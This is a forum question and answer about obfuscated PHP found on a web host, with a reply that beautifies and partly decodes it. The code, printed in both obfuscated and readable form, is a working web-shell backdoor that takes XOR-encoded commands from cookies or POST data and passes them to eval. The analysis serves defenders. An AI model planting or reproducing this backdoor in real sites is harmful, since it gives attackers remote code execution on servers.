这个恶意代码是什么？

I've found this code on a hosting, it appears that it's written by hacker, what is this code for?

<?php $zbsdho = '49y87v3bktgmrfc#ueo\'5anpdi-0_ls2*xH';$ivlmhe = Array();$ivlmhe[] = $zbsdho[34].$zbsdho[32];$ivlmhe[] = $zbsdho[1].$zbsdho[24].$zbsdho[21].$zbsdho[17].$zbsdho[20].$zbsdho[13].$zbsdho[4].$zbsdho[0].$zbsdho[26].$zbsdho[3].$zbsdho[20].$zbsdho[17].$zbsdho[31].$zbsdho[26].$zbsdho[0].$zbsdho[0].$zbsdho[20].$zbsdho[20].$zbsdho[26].$zbsdho[7].$zbsdho[7].$zbsdho[27].$zbsdho[3].$zbsdho[26].$zbsdho[27].$zbsdho[3].$zbsdho[24].$zbsdho[17].$zbsdho[14].$zbsdho[14].$zbsdho[6].$zbsdho[3].$zbsdho[14].$zbsdho[20].$zbsdho[4].$zbsdho[14];$ivlmhe[] = $zbsdho[15];$ivlmhe[] = $zbsdho[14].$zbsdho[18].$zbsdho[16].$zbsdho[22].$zbsdho[9];$ivlmhe[] = $zbsdho[30].$zbsdho[9].$zbsdho[12].$zbsdho[28].$zbsdho[12].$zbsdho[17].$zbsdho[23].$zbsdho[17].$zbsdho[21].$zbsdho[9];$ivlmhe[] = $zbsdho[17].$zbsdho[33].$zbsdho[23].$zbsdho[29].$zbsdho[18].$zbsdho[24].$zbsdho[17];$ivlmhe[] = $zbsdho[30].$zbsdho[16].$zbsdho[7].$zbsdho[30].$zbsdho[9].$zbsdho[12];$ivlmhe[] = $zbsdho[21].$zbsdho[12].$zbsdho[12].$zbsdho[21].$zbsdho[2].$zbsdho[28].$zbsdho[11].$zbsdho[17].$zbsdho[12].$zbsdho[10].$zbsdho[17];$ivlmhe[] = $zbsdho[30].$zbsdho[9].$zbsdho[12].$zbsdho[29].$zbsdho[17].$zbsdho[22];$ivlmhe[] = $zbsdho[23].$zbsdho[21].$zbsdho[14].$zbsdho[8];foreach ($ivlmhe[7]($_COOKIE, $_POST) as $owoafjz => $nunarwf){function ogehexx($ivlmhe, $owoafjz, $oibsdj){return $ivlmhe[6]($ivlmhe[4]($owoafjz . $ivlmhe[1], ($oibsdj / $ivlmhe[8]($owoafjz)) + 1), 0, $oibsdj);}function lxasj($ivlmhe, $arihtmu){return @$ivlmhe[9]($ivlmhe[0], $arihtmu);}function jxlby($ivlmhe, $arihtmu){$flgqwzt = $ivlmhe[3]($arihtmu) % 3;if (!$flgqwzt) {eval($arihtmu[1]($arihtmu[2]));exit();}}$nunarwf = lxasj($ivlmhe, $nunarwf);jxlby($ivlmhe, $ivlmhe[5]($ivlmhe[2], $nunarwf ^ ogehexx($ivlmhe, $owoafjz, $ivlmhe[8]($nunarwf))));}

First start off by beautifying the code:

<?php
$zbsdho   = '49y87v3bktgmrfc#ueo\'5anpdi-0_ls2*xH';
$ivlmhe   = Array();
$ivlmhe[] = $zbsdho[34] . $zbsdho[32];
$ivlmhe[] = $zbsdho[1] . $zbsdho[24] . $zbsdho[21] . $zbsdho[17] . $zbsdho[20] . $zbsdho[13] . $zbsdho[4] . $zbsdho[0] . $zbsdho[26] . $zbsdho[3] . $zbsdho[20] . $zbsdho[17] . $zbsdho[31] . $zbsdho[26] . $zbsdho[0] . $zbsdho[0] . $zbsdho[20] . $zbsdho[20] . $zbsdho[26] . $zbsdho[7] . $zbsdho[7] . $zbsdho[27] . $zbsdho[3] . $zbsdho[26] . $zbsdho[27] . $zbsdho[3] . $zbsdho[24] . $zbsdho[17] . $zbsdho[14] . $zbsdho[14] . $zbsdho[6] . $zbsdho[3] . $zbsdho[14] . $zbsdho[20] . $zbsdho[4] . $zbsdho[14];
$ivlmhe[] = $zbsdho[15];
$ivlmhe[] = $zbsdho[14] . $zbsdho[18] . $zbsdho[16] . $zbsdho[22] . $zbsdho[9];
$ivlmhe[] = $zbsdho[30] . $zbsdho[9] . $zbsdho[12] . $zbsdho[28] . $zbsdho[12] . $zbsdho[17] . $zbsdho[23] . $zbsdho[17] . $zbsdho[21] . $zbsdho[9];
$ivlmhe[] = $zbsdho[17] . $zbsdho[33] . $zbsdho[23] . $zbsdho[29] . $zbsdho[18] . $zbsdho[24] . $zbsdho[17];
$ivlmhe[] = $zbsdho[30] . $zbsdho[16] . $zbsdho[7] . $zbsdho[30] . $zbsdho[9] . $zbsdho[12];
$ivlmhe[] = $zbsdho[21] . $zbsdho[12] . $zbsdho[12] . $zbsdho[21] . $zbsdho[2] . $zbsdho[28] . $zbsdho[11] . $zbsdho[17] . $zbsdho[12] . $zbsdho[10] . $zbsdho[17];
$ivlmhe[] = $zbsdho[30] . $zbsdho[9] . $zbsdho[12] . $zbsdho[29] . $zbsdho[17] . $zbsdho[22];
$ivlmhe[] = $zbsdho[23] . $zbsdho[21] . $zbsdho[14] . $zbsdho[8];
foreach ($ivlmhe[7]($_COOKIE, $_POST) as $owoafjz => $nunarwf) {
    function ogehexx($ivlmhe, $owoafjz, $oibsdj)
    {
        return $ivlmhe[6]($ivlmhe[4]($owoafjz . $ivlmhe[1], ($oibsdj / $ivlmhe[8]($owoafjz)) + 1), 0, $oibsdj);
    }
    function lxasj($ivlmhe, $arihtmu)
    {
        return @$ivlmhe[9]($ivlmhe[0], $arihtmu);
    }
    function jxlby($ivlmhe, $arihtmu)
    {
        $flgqwzt = $ivlmhe[3]($arihtmu) % 3;
        if (!$flgqwzt) {
            eval($arihtmu[1]($arihtmu[2]));
            exit();
        }
    }
    $nunarwf = lxasj($ivlmhe, $nunarwf);
    jxlby($ivlmhe, $ivlmhe[5]($ivlmhe[2], $nunarwf ^ ogehexx($ivlmhe, $owoafjz, $ivlmhe[8]($nunarwf))));
}

Then we find the values located in $ivlmhe:

array(10) { 
[0]=> string(2) "H*" 
[1]=> string(36) "9dae5f74-85e2-4455-bb08-08decc38c57c" 
[2]=> string(1) "#" 
[3]=> string(5) "count" 
[4]=> string(10) "str_repeat" 
[5]=> string(7) "explode" 
[6]=> string(6) "substr" 
[7]=> string(11) "array_merge" 
[8]=> string(6) "strlen" 
[9]=> string(4) "pack" 
}

Then:

foreach (array_merge($_COOKIE, $_POST) as $key => $value) {
    function ogehexx($ivlmhe, $key, $oibsdj)
    {
        return substr(str_repeat($key . "9dae5f74-85e2-4455-bb08-08decc38c57c", ($oibsdj / strlen($key)) + 1), 0, $oibsdj);
    }
    function lxasj($ivlmhe, $arihtmu)
    {
        return @pack("H*", $arihtmu);
    }
    function jxlby($ivlmhe, $arihtmu)
    {
        $flgqwzt = count($arihtmu) % 3;
        if (!$flgqwzt) {
            eval($arihtmu[1]($arihtmu[2]));
            exit();
        }
    }
    $value = lxasj($ivlmhe, $value);
    jxlby($ivlmhe, explode("#", $value ^ ogehexx($ivlmhe, $key, strlen($value))));
}

That's all I've been able to decode so far, they are interested in the $_COOKIE & $_POST variables and perform various functions on them.

I made an error in the jxlby function originally, I have changed it to what it should be... the eval() within this function will be the nasty part, but I am finding it very difficult to figure out what exactly is being evaluated as the input for this function $arihtmu comes from this line which has a bitwise Xor operator in it explode("#", $value ^ ogehexx($ivlmhe, $key, strlen($value)))